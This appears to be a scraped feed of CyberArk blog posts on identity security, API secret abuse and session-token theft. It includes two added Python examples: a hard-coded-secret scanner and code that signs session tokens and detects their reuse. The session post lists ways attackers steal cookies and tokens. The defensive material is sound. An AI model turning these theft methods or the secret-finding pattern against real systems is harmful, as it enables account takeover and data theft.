
While attackers will inevitably become more aggressive and innovative in exploiting machine identities, security teams have the tools to protect their organizations more effectively. Fortunately, with layered defenses, discovery, leak detection, AI tools, automation and other innovative approaches, we can prevent an unsecured secret from exposing the entire organization to an attack.

Chris Smith is a director of product marketing at CyberArk.

The Knight in Shining Armor: Identity Security in Manufacturing Cybersecurity https://www.cyberark.com/blog/the-knight-in-shining-armor-identity-security-in-manufacturing-cybersecurity/ Fri, 19 Apr 2024 13:38:17 +0000 https://www.cyberark.com/?p=189880 Rendering of a digital fortress to accompany blog about manufacturing cybersecurity.

In the throes of the Fourth Industrial Revolution, the manufacturing sector stands at the crossroads of groundbreaking innovation and an ever-growing shadow of cyberthreats. IT modernization has created digital fortresses by transforming legacy manufacturing systems and operations into connected, smart factories – the demand for robust cybersecurity measures has never been more critical. Identity security acts as a noble knight armed with a sword and shield in the ongoing battle against digital adversaries. It can help to give manufacturing cybersecurity leaders the strategic advantage needed to help safeguard their domains.

The Dawn of a New Era in Manufacturing Cybersecurity

Envision the digital landscape of manufacturing as a vast kingdom. Alive with innovation and growth, this realm faces relentless threats from digital hackers eager to exploit any vulnerability. The merging of the Internet of Things (IoT) and operational technology (OT) has unveiled new gateways for cyber intruders, transforming cybersecurity from a mere concern to the bedrock of manufacturing resilience.

Graphical image of a cyberattack chain, along with a breakdown of five elements: credential theft; malicious actors; lateral and vertical movement; privilege escalation and abuse; actions on objectives.

The introduction of smart factory technologies also carries a double-edged sword. It propels us toward unmatched efficiency and connectivity and widens the battlefield, necessitating fortified defenses.

The Vanguard of Manufacturing Cybersecurity

In this evolving arena, identity security solutions emerge as the knight in shining armor, equipped to protect the realm’s digital and physical assets. By tackling the core challenges of privileged access management (PAM), endpoint security, secure remote access, credentials and overarching compliance, identity security doesn’t merely defend – it empowers manufacturers to secure their innovation processes, uphold operational integrity and nurture trust among customers and partners alike.

Solutions for Manufacturing’s Greatest Cybersecurity Challenges

To fortify your manufacturing operations, understand the evolving realm and digital attack landscape. Start with a comprehensive audit of your assets to assess their maturity and interconnectivity. As manufacturing merges more with digital technologies, vulnerabilities may increase, particularly through legacy systems and complex supply chains. The most successful business transformations come from prioritizing cyber-safety within your organizational culture, fostering a shift toward recognizing the critical role of digital technologies in traditional manufacturing environments.

Implementing such strategic measures is vital for protecting your kingdom, maintaining operational integrity and gaining a competitive edge. With these foundations, there is a clear path for safeguarding your operations with the assistance of an identity security knight.

Here are some essential strategies that can help to achieve this:

  • The quest for authorized access. PAM systems can help to ensure that only authorized personnel have access to sensitive systems and data – the keys to the kingdom. These systems act as gatekeepers, verifying identities and enforcing access policies to protect against unauthorized entry and the spread of ransomware and malware.
  • Guardians of the OT environments. Endpoint security solutions are essential for protecting the operational efficiencies of manufacturing environments. These solutions defend against the dark arts of malware and other cyberthreats, ensuring the continuity of production processes and the safety of critical data.
  • The bridge to secure remote access. With increased remote operations, secure remote access solutions are vital for maintaining secure connections to core business systems. Proper remote access lets in authorized users (aka friendly traders and countrymen) and disallows non-authorized users – and cyberthreats – from accessing privileged systems, helping you remain secure and private.
  • The isolated access to OT. Effective management of both human and non-human credentials is critical to securing sensitive systems. However, some legacy machines and systems can’t or won’t be changed. By providing authorized and authenticated users with isolated, secure access (aka fortress trenches and tunnels) to those machines or systems in OT environments, businesses can help mitigate risks.
  • A guide through compliance and risk management. Navigating the treacherous waters of regulatory requirements and cybersecurity risks requires robust identity security solutions. These solutions assist in managing compliance effectively, reducing risks and ensuring that the business remains protected and compliant.

Exploring Strategies for Enhanced Future Security

In an era where digital innovation and cybersecurity threats advance hand in hand, standing still is not an option. Your journey toward a more secure manufacturing operation begins with a single, crucial step: enhancing your identity security.

Discover how a comprehensive identity security solution has helped Coca-Cola Europacific Partners create a robust defense against attacks that brought them closer to being the world’s most digitized bottling operation, all because they now have a 360-degree view of privileged access activities.

Christian Goetz is a director of presales success at CyberArk.

Editor’s note: Attackers constantly set their sights on any vulnerable aspect of an organization. To explore how you can build a defense-in-depth approach to securing all human and non-human identities across OT systems, check out our webinar, “13 Ways to Improve OT Security.” And, for a dive into OT cybersecurity and its challenges and opportunities, listen to our Trust Issues podcast conversation with Mike Holcomb, the Fellow of Cybersecurity and the ICS/OT Cybersecurity Lead at Fluor. You can check it out in the player below or wherever you get your podcasts.

CIO POV: The Power of Cybersecurity Collaboration https://www.cyberark.com/blog/cio-pov-the-power-of-cybersecurity-collaboration/ Wed, 17 Apr 2024 15:01:54 +0000 https://www.cyberark.com/?p=189798 Cybersecurity Collaboration

You’ve undoubtedly heard Michael Jordan’s famous quote, “Talent wins games, but teamwork and intelligence win championships.” Jordan’s words encapsulate the fruition of team spirit and strategic thinking through tactical implementation. Similarly, in the cybersecurity world, we often say that security is a team game, but have you ever considered who’s on the team and who isn’t but should be?

Cybersecurity is the collective responsibility of every employee, partner, contractor and vendor to fortify all the walls and stop bad actors from gaining access to your kingdom. We can divide this collective responsibility into three layers that touch all aspects of the business. Internal collaboration is a starting point for this collective responsibility across all business functions. Then, there’s collaboration with the third-party vendor community. And then, we collaborate to share and learn from our peers’ experiences.

A three-fold approach to cybersecurity collaboration will bring constant scrutiny and attention to security issues while enabling faster communication. In essence, you’ll have more eyes across the organization’s IT environment to identify impending risks, security incidents and potential breaches, with shorter response times.

Let’s take a detailed look at the three-fold approach and how the effort can help you benefit from driving collaboration on collective cybersecurity responsibility.

The Three-Fold Approach to Cybersecurity Collaboration

Here’s what an optimal three-pronged cybersecurity collaboration effort looks like:

1. Internal Collaboration

While cybersecurity teams are responsible for securing the network, data, endpoints, workloads, user access, automation, orchestration and continuous threat detection and prevention, other business functions have an equal hand in ensuring continued education and responsible behavior that protects your organization’s digital assets. Think of your cybersecurity team as your Tier 1 stakeholder, with the authority to make decisions and implement security controls for the entire organization.

Your Tier 2 stakeholders include leaders of various business functions, such as HR or finance. For instance, HR ensures all new hires receive an optimal onboarding process intertwined with IT services and security controls deployment. These functional Tier 2 stakeholders can collaborate with Tier 1 stakeholders to implement best-in-class security controls and cybersecurity awareness training for all Tier 3 stakeholders, including employees, contractors and third-party partners.

We should consider all three tiers of stakeholders equally significant because if the average user – a Tier 3 stakeholder – can’t follow the recommended security hygiene by the other stakeholders, the entire organization winds up at risk of a security incident or a breach.

2. External Collaboration

Now that we’ve spotlighted internal stakeholders, let’s consider that our external stakeholders are third-party vendors in the increasingly complex technology ecosystem. A vulnerable software stack is a gateway for bad actors to unleash the chaos of malware and identity-related attacks. It’s, therefore, essential to build trust with each third-party vendor providing your organization with any product or service. These third-party vendors must address critical CVEs promptly and allow your organization’s Tier 1 stakeholders to review their offerings for quality and the vendor’s security posture.

Particularly now in the burgeoning era of AI-powered products and services, it’s more critical than ever that your organization’s Tier 1 stakeholders have a cadenced opportunity to evaluate the AI implementation in the products or services you use.

3. Peer Collaboration

Technology leaders and practitioners must learn from one another. As such, peer collaboration is the most important part of comparing and contrasting cybersecurity strategies that support unique business requirements.

There are a couple of different ways to participate in peer collaboration. For example, meet-up groups on relevant topics such as AI seek to bring together like-minded leaders to discuss their unique experiences and learn from shared experiences. Alternatively, industry-focused peer groups that focus on specific topics, such as the intersection of FinOps and security, can bring a wealth of knowledge to CIOs and CISOs of organizations operating in regulated industries. To this end, I will hold a CISO roundtable at CyberArk’s marquee identity security event, IMPACT ‘24, in Nashville next month. I hope to create a trusted circle of cybersecurity leaders who can leverage shared experiences to optimize cybersecurity collaboration on all three fronts mentioned above and deliver better defenses against bad actors.

How Can Cybersecurity Collaboration Work Effectively?

For any initiative to succeed, it needs a detailed process plan. To design an effective collaborative approach, we must:

  • Communicate. Clear, concise and cadenced communication is the foundation of any successful collaborative initiative. I often recommend that more communication is better than none. This way, we can ensure that internal and external stakeholders know their roles and responsibilities.
  • Commit. I recommend a dedicated individual or team responsible for committing to cybersecurity collaboration initiatives within each stakeholder group. This way, we ensure accountability on key initiatives with assurances that they do not fall through the cracks.
  • Empower. Part of any team sport is to ensure your team members are empowered to make effective decisions quickly. If you are the bottleneck, make sure you have a plan to get out of the way. Remember, agility is essential because, in cybersecurity, no one day is the same as yesterday.
  • Educate. Continuously educate all stakeholders on standard cybersecurity hygiene. The basics of common security practices are often the key to thwarting bad actors.
  • Motivate. Remember that every sports competition ultimately crowns a winner, and every winner receives a prize. Think of how you can motivate and incentivize your stakeholders to remain committed to continued cybersecurity collaboration. It may be as simple as a quarterly award or recognition to help ensure collaboration practices run deep within your organization’s DNA.

I would love to hear about how you initiate collaboration in your organization. I also hope you attend (and participate in) my CIO and CISO roundtable at CyberArk IMPACT in Nashville. Here’s to fostering collaboration because … we’re all playing for the same team.

Omer Grossman is the global chief information officer at CyberArk. You can check out more content from Omer on CyberArk’s Security Matters | CIO Connections page.

Understanding APIs and How Attackers Abuse Them to Steal Data
https://www.cyberark.com/blog/understanding-apis-and-how-attackers-abuse-them-to-steal-data/ – Fri, 12 Apr 2024 19:55:23 +0000

Simply put, APIs (short for application programming interfaces) are how machines, cloud workloads, automation and other non-human entities communicate with one another. They also represent an access point to highly sensitive company data and services. Almost every organization uses these machine interfaces, and their usage is only growing because they are essential to digital transformation and automation initiatives. Machine identities and APIs are closely connected because any programmatic interface accessing important data or protected services needs an identity, such as a password, API key or another secret.

While essential and prevalent, APIs are potential attack vectors when not properly protected via machine identity security best practices. They can be exploited to expose sensitive data (e.g., customer lists, personally identifiable information (PII) and credit card details) while enabling application-to-application communication.

How Cyber Criminals Abuse and Exploit APIs

Cyberattackers constantly attempt to steal the secrets that allow machines to call APIs, so that they can operate under the stolen machine identity. By doing so, they assume the identity of whatever held that secret and use it to gain more access and privileges on the way to their goal. Along the way, they could, for instance, use a script or a user account to stop or start a virtual server, copy a database or even wipe out entire cloud workloads.

Fortunately for attackers, developers under pressure to move quickly often take shortcuts, such as hard-coding API keys and other secrets. Take the Uber breach reported in 2022 as an example: the attacker found and used hard-coded secrets embedded in a PowerShell script to gain high-level access and escalate privileges.

Since many security teams view API security as a code issue, they may not know how many APIs and API secrets exist within their organization, where they’re located or how they are used. A 2023 Ponemon Institute study reveals that more than half of IT and IT security professionals say it’s challenging to discover and inventory all APIs. The many third parties connected to an organization’s APIs exacerbate this challenge. And as attackers shift left into software development and testing environments, insecure API design and functionality significantly increase software supply chain risks.

These factors may be why organizations are only confident in preventing 26% of API attacks and believe that only 21% of such attacks can be effectively detected and contained, according to the same Ponemon study. As API access to critical resources continues to sprawl, it’s time for security teams to change how they think about APIs.

Top API Identity Security Risks

Most of today’s top API security risks relate to identity. Yet, critical identity security controls in many organizations, including least privilege enforcement and continuous monitoring, only cover human users. This means that secrets used by applications, scripts and other machine identities – that outnumber human identities 45:1 – are exposed. Attackers can “hook” API keys and other secrets through phishing attacks, find them embedded in applications, automation scripts and DevOps tools and steal them from public repositories like GitHub to access sensitive company assets. Artificial intelligence (AI) advancements have made it even easier for cybercriminals to automate and scale identity-based attacks.

The Open Web Application Security Project (OWASP), a recognized industry source for software security research, highlights some recent pressing API identity security issues in its 2023 API Security Top 10 list, including those outlined below.

Visual of OWASP 2023 API security top 10 highlights identity security risks

Simplify API Security with Centralized Secrets Management

Forward-looking organizations are working to understand how digital business characteristics impact their security practices and move toward a Zero Trust model. As part of this, they view human and non-human identity security as equally important. They’re tackling secrets management challenges by centralizing and automating how applications, DevOps and automation tools use API keys and other secrets to access databases, cloud environments and other sensitive resources. With this approach, they only have one program to support but can gain the full visibility, audit trails and policy enforcement capabilities they need to ensure nothing falls through the cracks.

Companies we work with have also seen how centralized secrets management simplifies how development and security teams protect applications, CI/CD pipelines and the software supply chain. They’re doing this with out-of-the-box integrations with existing tools and platforms so that tasks like secrets rotation, audit and data collection automatically run in the background without impacting developer workflows.
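As an added illustration of two points made above (secrets hard-coded into scripts, and moving secrets out of source into runtime injection managed centrally), here is example code that is not part of the original post and not code from any CyberArk product: a small scanner that flags string literals assigned to secret-looking variable names when the value has high entropy, beside the pattern where the key is read from the runtime environment instead. The sample script text, the variable names and the secret-looking values are constructed placeholders, and the entropy threshold is an assumed tuning value.

```python
"""Find hard-coded secrets in source and show the runtime-injected alternative.

Added example, not CyberArk's code. The sample script text, the variable
names and the secret-looking values below are constructed placeholders.
"""
import math
import os
import re
from collections import Counter

# A string literal assigned to a variable whose name suggests a credential.
# Matches Python, shell and PowerShell style assignments ($name = "...").
SECRET_ASSIGNMENT = re.compile(
    r"""(?ix)
    (?P<name>[$\w.]*(?:api[_-]?key|secret|token|password|passwd)\w*)
    \s*[:=]\s*
    ["'](?P<value>[^"']{8,})["']
    """
)


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character: random keys score high, words score low."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def find_hardcoded_secrets(source: str, min_entropy: float = 3.0) -> list:
    """Return one finding per line that assigns a high-entropy literal to a secret-like name."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        m = SECRET_ASSIGNMENT.search(line)
        if not m:
            continue
        value = m.group("value")
        # "${VAR}" is a template reference filled in at deploy time, not a secret.
        if value.startswith("${"):
            continue
        entropy = shannon_entropy(value)
        if entropy < min_entropy:  # dictionary words and placeholders fall below this
            continue
        findings.append({"line": lineno, "name": m.group("name"), "entropy": round(entropy, 2)})
    return findings


def load_api_key(env_var: str = "API_KEY") -> str:
    """Hardened pattern: the secret is injected at runtime (by a secrets manager,
    vault integration or CI variable) and never appears in the source tree."""
    value = os.environ.get(env_var)
    if not value:
        # Fail closed rather than falling back to a literal in the code.
        raise RuntimeError(f"{env_var} not provided by the environment")
    return value


# Constructed sample input: a deployment script with credentials baked in.
SAMPLE_SOURCE = """\
# constructed deployment script (sample input)
$apiKey = "X7q2Zp9L4m3NvR8wK1tJ6hD"
$password = "letmeinnow"
db_token = "Qw8Lm2Xz7Vp4Rt9Ky1Nb6Hs3"
password = "${DB_PASSWORD}"
api_key = os.environ["API_KEY"]
"""

if __name__ == "__main__":
    for f in find_hardcoded_secrets(SAMPLE_SOURCE):
        print(f"line {f['line']}: {f['name']} looks like a hard-coded secret (entropy {f['entropy']})")
```

Run against the constructed sample, the scanner reports lines 2 and 4 (the random-looking literals) and stays quiet on the low-entropy placeholder, the `${DB_PASSWORD}` template reference and the line that reads the key from the environment. A scanner like this belongs in a pre-commit hook or CI step so that findings block a merge rather than surfacing only after a secret has shipped.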

Properly securing APIs and other non-human identities is imperative for business. Organizations that do it right will be better positioned to defend against cyberattacks, drive operational efficiencies, satisfy audit and compliance requirements and enable innovation.

John Walsh is a senior product marketing manager at CyberArk.

Cookies Beyond Browsers: How Session-Based Attacks Are Evolving
https://www.cyberark.com/blog/cookies-beyond-browsers-how-session-based-attacks-are-evolving/ – Tue, 09 Apr 2024 15:05:01 +0000

In the past few years, we have witnessed a significant shift in the attack landscape, from stealing clear text credentials to targeting session-based authentication. This trend is driven by the proliferation of multi-factor authentication (MFA), which makes it harder for attackers to compromise accounts with just passwords. However, MFA is not a silver bullet, and post-authentication materials like session tokens, cookies, API keys and machine certificates can still be exploited to bypass authentication and gain access to sensitive systems and data.

In this blog post, I will share some of our red team insights and explain how session-based attacks are evolving beyond the web browser. I will also recommend ways for organizations to protect themselves from these threats and reduce their attack surfaces.

What Are Post-Authentication Attacks and Why Are They Dangerous?

Post-authentication attacks are a type of attack that targets the authentication tokens that are used to maintain a user’s or a machine’s identity and access rights after the initial login process. These tokens can take various forms, such as cookies, API keys, machine certificates and OAuth tokens. They are often stored in the browser, in files, in memory or in databases and are transmitted over the network when a user or a machine interacts with a web application or an API.

The main advantage of session-based attacks for the attackers is that because they happen after the authentication phase and the user is already validated, they can bypass MFA and other security controls applied at the login stage. An attacker can impersonate the user or the machine and access their authorized resources by stealing or forging a valid session token (via the Golden Ticket or Golden SAML attack techniques). Moreover, session tokens are often long-lived and have broad privileges, meaning the attacker can maintain persistence and move laterally within the network.

How Post-Authentication Threats Are Evolving Amid the Expanding Attack Surface

The most well-known and common form of post-authentication attack is cookie stealing, which involves capturing or manipulating the cookies that web browsers use to authenticate users to web applications. Cookies are session tokens issued by the web server after users log in with their credentials and MFA, and they are stored in the browser. The browser then sends the cookies along with every request to the web server, which validates them and grants the user access.

Cookie stealing can be performed in various ways, such as:

  • Exploiting vulnerabilities in the web application or the browser, such as cross-site scripting (XSS), cross-site request forgery (CSRF) or XML external entity (XXE) injection, that allow the attacker to execute malicious code or requests on behalf of the user and access their cookies.
  • Sniffing or intercepting the network traffic between the user and the web server and extracting the cookies from the HTTP headers. This can be done by compromising the user’s device, the web server or any intermediate node on the network, such as a router, a proxy or a firewall.
  • Accessing the browser’s storage, where the cookies are saved, and copying them to the attacker’s device. This can be done by exploiting the user’s device or by tricking the user into downloading a malicious browser extension, a file or software that can read the browser’s storage.
  • Scraping the browser’s process memory. Some cookies are session cookies: they are never written to disk and exist only in browser memory, as ephemeral cookies, for the duration of the session and as long as the browser is open. Because browsers are designed to run as unprivileged applications, any other program running with the same (unprivileged) level of access can read the browser’s memory.

As you can see, cookies are key security material and are sought out by threat actors. If you were to eliminate cookies from the browser, the experience would become more secure. And that’s no longer a hypothetical scenario, with the arrival of our recently released, identity-centric CyberArk Secure Browser – an industry first (and one our red team helped develop). The browser never writes cookies to a device’s disk, which means there are no cookies on disk for attackers to steal. By eliminating cookies from the disk, organizations can help protect themselves from certain types of session-based attacks that rely on stealing stored cookies to bypass the authentication process.

However, cookies are not the only form of session token that session-based attacks can target. As web applications and APIs become more complex and diverse, and as more machines and devices communicate with each other over the internet, other forms of session tokens are emerging and becoming more prevalent. These include:

  • API keys, which are secret tokens that are used to authenticate and authorize machines or programmatic users to access APIs. API keys are often used for programmatic or automated interactions with cloud services, such as spinning up virtual machines, accessing storage buckets or sending notifications. API keys are usually stored in files or databases and transmitted over the network as HTTP headers or parameters.
  • Machine certificates, which are digital certificates used to authenticate and authorize communication between machines or devices. They are often used to secure connections such as VPN, HTTPS or SSH sessions between servers, clients and IoT devices. Machine certificates are usually stored in files or hardware modules and are transmitted over the network as part of the TLS handshake.
  • OAuth tokens, which are tokens that are used to delegate access to third-party applications or services. OAuth tokens are often used for social login, where a user can sign in to a web application using their existing account from another platform, such as Google, Facebook or X (née Twitter). OAuth tokens are usually stored in the browser or databases and transmitted over the network as HTTP headers or parameters.

These session tokens are also vulnerable to session-based attacks and can be stolen or forged by attackers in ways similar to cookies. For example:

  • API keys can be exposed by vulnerabilities in the API or the client, by network sniffing or interception – or by accessing the files or databases where they are stored.
  • Machine certificates can be compromised by vulnerabilities in the TLS protocol or the implementation, network sniffing or interception or accessing the files or hardware modules where they are stored.
  • OAuth tokens can be hijacked by vulnerabilities in the OAuth protocol or the implementation, network sniffing or interception or accessing the browser or databases where they are stored. (A recent example of this is APT29’s attack on Microsoft, where the attackers breached a legacy test OAuth application and then created a series of malicious OAuth apps, which enabled them to gain further access. This ultimately allowed the attackers to access certain corporate email accounts.)

How Organizations Can Help Protect Themselves From Post-Authentication Attacks

Post-authentication attacks are a serious and growing threat, and organizations need to take proactive measures to protect themselves and their users from these attacks. Some of the best practices and recommendations that organizations can follow are:

  • Implement the principle of least privilege (PoLP) and limit the scope and duration of the session tokens. Session tokens should only grant the minimum access rights needed, when needed (just-in-time), for the specific task or interaction and should expire or be revoked as soon as possible. This can reduce the impact and the risk of session token compromise.
  • Enforce strong encryption and integrity checks on the network communication and the session tokens. Session tokens should be encrypted and signed by the issuer and transmitted only over secure channels, such as HTTPS or TLS. This can prevent the attackers from sniffing, intercepting or tampering with them.
  • Monitor and audit the usage and activity of session tokens. The issuer should log and track every session token, and abnormal or suspicious behavior – such as multiple or concurrent logins, unusual locations or devices, or anomalous requests or actions – should be detected and alerted on. This can help organizations identify and respond to session token compromise.
  • Educate and train the users and the developers on the risks and the best practices of session token security. Users should be aware of the dangers of phishing, malware and social engineering and avoid clicking on suspicious links, downloading unknown files or sharing their session tokens with anyone. Developers should be familiar with the latest session token security standards and guidelines and follow secure coding and testing practices.
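The first three recommendations above, carried into code as an added example (not code from the original post or from CyberArk): tokens that carry only the scopes a task needs and a short expiry, an HMAC signature checked in constant time so forged or spliced tokens are rejected, and a detector that flags the same token being presented from two source addresses within a short window. The token format, the signing key and the audit log lines are constructed for illustration; a production issuer would use an established token standard and keep the key in an HSM or secrets manager.

```python
"""Short-lived, scoped, signed session tokens and detection of token replay.

Added example, not CyberArk's code. The token format, the signing key and the
audit log lines are constructed for illustration; a production issuer would use
a standard such as JWT or PASETO with a key held in an HSM or secrets manager.
"""
import base64
import hashlib
import hmac
import json
import time
from collections import defaultdict
from typing import Optional

# Constructed demo key. In a real deployment it lives in a secrets manager or HSM.
SIGNING_KEY = b"constructed-demo-signing-key-not-for-production"


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_token(subject: str, scope: list, ttl_seconds: int, now: Optional[float] = None) -> str:
    """Least privilege: carry only the scopes the task needs and expire quickly."""
    now = int(time.time() if now is None else now)
    payload = {"sub": subject, "scope": sorted(scope), "iat": now, "exp": now + ttl_seconds}
    body = _b64(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(SIGNING_KEY, body.encode(), hashlib.sha256).digest()
    return f"{body}.{_b64(sig)}"


def validate_token(token: str, required_scope: str, now: Optional[float] = None) -> Optional[dict]:
    """Return the payload only if signature, expiry and scope all check out."""
    now = time.time() if now is None else now
    try:
        body, sig = token.split(".")
        expected = hmac.new(SIGNING_KEY, body.encode(), hashlib.sha256).digest()
        # Constant-time comparison: a forged or spliced signature is rejected
        # without leaking how many bytes matched.
        if not hmac.compare_digest(expected, _unb64(sig)):
            return None
        payload = json.loads(_unb64(body))
        if now >= payload["exp"] or required_scope not in payload["scope"]:
            return None
        return payload
    except (ValueError, KeyError, TypeError):
        return None


# Constructed audit log: one JSON line per request authenticated with a token.
SAMPLE_AUDIT_LOG = """\
{"ts": 100, "sub": "alice", "token_id": "t1", "ip": "10.0.0.5", "action": "read"}
{"ts": 130, "sub": "alice", "token_id": "t1", "ip": "10.0.0.5", "action": "read"}
{"ts": 160, "sub": "alice", "token_id": "t1", "ip": "203.0.113.9", "action": "export"}
{"ts": 200, "sub": "bob", "token_id": "t2", "ip": "10.0.0.7", "action": "read"}
"""


def detect_token_reuse(log_text: str, window_seconds: int = 300) -> list:
    """Flag a token used from more than one source IP inside a short window,
    a classic sign that a session token was stolen and replayed elsewhere."""
    seen = defaultdict(list)  # token_id -> [(ts, ip), ...]
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        recent_ips = {ip for ts, ip in seen[ev["token_id"]] if ev["ts"] - ts <= window_seconds}
        if recent_ips and ev["ip"] not in recent_ips:
            alerts.append({"token_id": ev["token_id"], "sub": ev["sub"], "ts": ev["ts"],
                           "ips": sorted(recent_ips | {ev["ip"]})})
        seen[ev["token_id"]].append((ev["ts"], ev["ip"]))
    return alerts


if __name__ == "__main__":
    tok = issue_token("alice", ["read"], ttl_seconds=300)
    print("valid for read:", validate_token(tok, "read") is not None)
    print("valid for admin:", validate_token(tok, "admin") is not None)
    for alert in detect_token_reuse(SAMPLE_AUDIT_LOG):
        print("possible token theft:", alert)
```

Two design choices are worth noting. The scope check happens at every use, not only at issuance, so a token minted for a read-only task cannot be replayed against an administrative endpoint even if it is stolen. And the replay detector keys on the token rather than the user: a person legitimately holding two sessions on two devices generates two tokens, whereas one token appearing from two networks inside a few minutes is the signature of theft and is what the alert should fire on.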

With attackers relentlessly finding new ways to exploit them, post-authentication attacks are a complex and evolving challenge. Organizations must be prepared and vigilant to defend themselves from these threats by implementing security measures such as least privilege, monitoring and maintaining an assume-breach mindset. Additionally, solutions such as CyberArk Secure Browser, which completely eliminates cookies from the disk, can provide an added layer of protection.

Shay Nahari is VP of CyberArk Red Team Services.

Editor’s note: For more insights from Shay Nahari on this subject, secure web browsing and beyond, listen to the April 2024 CyberArk Trust Issues podcast episode, “Secure Browsing and Session-Based Threats.” The episode is available in the player below and on most major podcast platforms.

How Secure is Automotive Digital Identity?
https://www.cyberark.com/blog/how-secure-is-automotive-digital-identity/ – Tue, 02 Apr 2024 19:52:00 +0000

In the automotive industry’s fast lane, the fusion of digital innovation with vehicular engineering has revolutionized how we manufacture, drive and protect our vehicles. It also helps to ensure our cars are safeguarded against cyber risks. And it’s at this juncture that identity security emerges as a critical priority – serving as both a shield and a guide, leading the industry through the complexities of automotive cybersecurity challenges with unmatched precision.

Defending the Digital Road

Imagine the automotive industry as a vast, interconnected network of highways, where every vehicle – from family sedan to motorcycle to the most sophisticated autonomous car – communicates within a world far beyond the asphalt through connected vehicle technology. This seamless interaction is powered by vehicle-to-everything (V2X) technology, enabling connected cars to communicate with one another – and with infrastructure, pedestrians, networks and even the power grid. Connected vehicle technology forms the backbone of modern automotive safety and efficiency, facilitating real-time sharing of crucial data such as traffic conditions, weather updates and road safety alerts.

However, it also introduces novel challenges in cybersecurity, making the role of secure identity verification more critical than ever at the manufacturing stage. Each connected car, acting as a pivotal node in the safety and operational efficiency of our digital highways, relies on a next-generation automotive and mobility security solution to safeguard the integrity of data exchange and protect against cyber threats to help ensure the seamless functionality of this intricate and interconnected network.

Elevating Automotive Security Through Identity Protection

The mastery of securing the privileged pathways of the automotive manufacturing ecosystem acts like an invisible shield. From the initial design sketches to the factories that bring new cars to life, a comprehensive approach to identity security helps ensure that every entity, human or machine, is thoroughly verified, authenticated and monitored.

The journey from innovation to vulnerability can unfold through a sophisticated attack chain in the rapidly evolving automotive industry. Sometimes, it might begin with credential theft, where attackers mine sensitive information through methods like social engineering. These malicious actors, whether external or internal, navigate an organization’s digital ecosystem, moving laterally across systems or vertically to higher privileges, aiming to disrupt operations or steal valuable data. Understanding and dismantling this attack chain, with a strategic approach for identity security, is critical for automotive leaders to shield their operations and vehicles against today’s multifaceted cyber threats.

Figure: “Dissecting the Attack Chain”

For manufacturers, this means securely guarding their blueprints, production secrets and assembly output.

Navigating the Top Seven Automotive Cybersecurity Challenges with Identity Security

Understanding the seven critical areas of automotive cybersecurity is crucial, as identity security can significantly enhance your organization’s preparedness and strengthen its stance against potential breaches. This strategic knowledge enables you to stay ahead in safeguarding against identity-related vulnerabilities within the automotive sector:

  1. V2X communication. Today’s vehicles are manufactured with the capability to communicate with one another and with their infrastructure, and identity security acts as a trusted courier that validates human and non-human identities in the automotive manufacturing process.
  2. Identity verification. Cyber threats loom like bandits in the digital expanse. Advanced identity verification acts as a vigilant patrol, safeguarding the credentials and secrets of administrators, users, applications, and machines interacting with connected vehicles and data.
  3. Regulation and compliance. The automotive world’s regulatory environment is a labyrinth and ever-changing. A robust identity security strategy is like GPS, guiding manufacturers through compliance and helping to ensure a smooth regulatory journey, which is a growing challenge for automotive manufacturers as cars become increasingly data-centric.
  4. Supply chain. Picture the automotive supply chain as a network of roads and bridges. A unified identity security approach provides rigorous checkpoints, verifying each component’s integrity before it enters the production line, underpinning the seamless integration of connected devices.
  5. Data privacy. Strict identity security protocols secure the data that connected vehicles generate, within cloud and enterprise environments, against unauthorized access, safeguarding the manufacturing of connected vehicles.
  6. Market growth. As the realm of automotive cybersecurity widens like an expanding network of roads and infrastructure, scalable identity security solutions help provide safe passage across a burgeoning ecosystem of connected devices.
  7. Collaboration. Automakers and cybersecurity entities must unite to share insights and strategies. Secure identity management facilitates this collaboration, helping to ensure the secure exchange of information and bolstering the collective defense of connected vehicles throughout the auto manufacturing process.

Driving Toward a Secure Horizon

Cybersecurity leaders can help steer their organizations toward secure, modernized processes with a comprehensive identity security strategy. Learn how a leading manufacturer reduced operation time by 87% while improving security.

Brian Carpenter is a senior director of business development, and Christian Goetz is a director of presales success at CyberArk.

Editor’s note: The complexities of the automotive industry require a holistic platform-based approach to secure cars of the present and future. Take a spin into this topic and listen to our Trust Issues podcast episode, “What’s Driving the Future of Automotive Security,” with guest Kaivan Karimi, Global Partner Strategy and OT Cybersecurity Lead – Automotive Mobility and Transportation at Microsoft. Karimi discusses the emphasis on identity security, data sovereignty, data privacy and compliance as we collectively navigate technological advancements in the automotive industry.

Election Security: Defending Democracy in Today’s Dynamic Cyber Threat Landscape
https://www.cyberark.com/blog/election-security-defending-democracy-in-todays-dynamic-cyber-threat-landscape/ – Thu, 28 Mar 2024 14:30:22 +0000

With over 50 countries heading to the polls this year, including major economies like the U.S., India and the U.K., 2024, one way or another, will be a defining year with over 4 billion voters – around half the world’s population – participating in the democratic process. However, amid this global exercise in democracy lurks a growing threat landscape fueled by ongoing geopolitical tensions, evolving technology and the ever-present risk of malinformation that can sway the election outcomes.

In recent years, misinformation and disinformation campaigns have influenced public opinion. In the 2019 U.K. election, several political advertisements and social media campaigns deceived voters with false claims and hidden agendas. In 2016, we witnessed how foreign adversaries’ potential involvement led to a breach and a leak of confidential data to influence the public and the outcome of the U.S. presidential race. Recognizing this, federal law enforcement and cybersecurity officials have warned state election officials about the impending threats ahead of the November 2024 U.S. Presidential elections.

With lots of cyber drama undoubtedly around the corner, let’s look at what’s at stake.

Geopolitical Risks and Nation-state Attacks

The intersection of global armed conflicts and cyber warfare significantly amplifies the risk to critical infrastructure, which is pivotal in supporting election machinery across countries on the verge of upcoming elections. Elections officials and their security teams will be highly vigilant. They are planning robust security strategies in a game to checkmate their aggressors who aim to disrupt the networks of government agencies and their technology partners.

